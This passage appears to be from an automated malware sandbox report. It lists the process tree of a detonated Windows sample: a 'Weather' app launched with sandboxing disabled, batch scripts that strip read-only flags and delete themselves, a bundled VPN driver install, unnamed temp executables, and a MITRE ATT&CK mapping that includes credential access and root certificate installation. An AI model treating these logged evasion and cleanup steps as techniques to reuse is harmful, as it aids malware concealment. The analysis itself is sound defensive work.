    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1560,2796471902555465165,6942226880892831012,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_749606599" --mojo-platform-channel-handle=3076 /prefetch:8
        5⤵
        
        PID:9076
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1560,2796471902555465165,6942226880892831012,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_749606599" --mojo-platform-channel-handle=1772 /prefetch:8
        5⤵
        
        PID:8360
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1560,2796471902555465165,6942226880892831012,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_749606599" --mojo-platform-channel-handle=2920 /prefetch:8
        5⤵
        
        PID:7212
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1560,2796471902555465165,6942226880892831012,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_749606599" --mojo-platform-channel-handle=2220 /prefetch:8
        5⤵
        
        PID:9332
    - - C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
        
        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1560,2796471902555465165,6942226880892831012,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7632_749606599" --mojo-platform-channel-handle=2136 /prefetch:8
        5⤵
        
        PID:8664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEF8E0.bat" "
    3⤵
    PID:2052
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
      4⤵
      Views/modifies file attributes
      PID:3764
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:8120
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:4380
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:8308
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEF8E0.bat"
      4⤵
      Views/modifies file attributes
      PID:7400
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEF8E0.bat" "
      4⤵
      PID:8660
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" cls"
      4⤵
      PID:8492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEF49A.bat" "
    3⤵
    PID:9152
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
      4⤵
      Views/modifies file attributes
      PID:7596
  - - C:\Windows\SysWOW64\timeout.exe
      C:\Windows\System32\timeout.exe 5
      4⤵
      Delays execution with timeout.exe
      PID:2840
  - - C:\Windows\SysWOW64\attrib.exe
      C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEF49A.bat"
      4⤵
      Views/modifies file attributes
      PID:7780
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEF49A.bat" "
      4⤵
      PID:9812
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" cls"
      4⤵
      PID:9988

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\8481524d12084e998d2bcab5e9433328 /t 744 /p 4620
1⤵
PID:1908

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4444

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3592

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7288

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:7864
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7d0f7844-d7be-7549-9510-1d30ee3dc321}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:4772
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000016C"
  2⤵
  PID:4044

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\60ea636cac9549eb9d1cb972f4ed6b9e /t 0 /p 4444
1⤵
PID:6072

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:4420

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7208

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:6652
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:8624

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:580

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5196

C:\Users\Admin\AppData\Local\Temp\9136.exe
C:\Users\Admin\AppData\Local\Temp\9136.exe
1⤵
PID:1016

C:\Users\Admin\AppData\Local\Temp\958C.exe
C:\Users\Admin\AppData\Local\Temp\958C.exe
1⤵
PID:5696

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6020

C:\Users\Admin\AppData\Local\Temp\B01A.exe
C:\Users\Admin\AppData\Local\Temp\B01A.exe
1⤵
PID:4256
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
  2⤵
  PID:8484

C:\Users\Admin\AppData\Local\Temp\D0E2.exe
C:\Users\Admin\AppData\Local\Temp\D0E2.exe
1⤵
PID:7104

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4072

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4200

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2188

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7664

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8200

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8300

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8388

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8448

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8544

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:9204

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:1028

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6160

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\c06b999c905648a9a2de5112c8c7f67b /t 3132 /p 3128
1⤵
PID:6648

C:\Users\Admin\AppData\Roaming\utsbwie
C:\Users\Admin\AppData\Roaming\utsbwie
1⤵
PID:4180

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery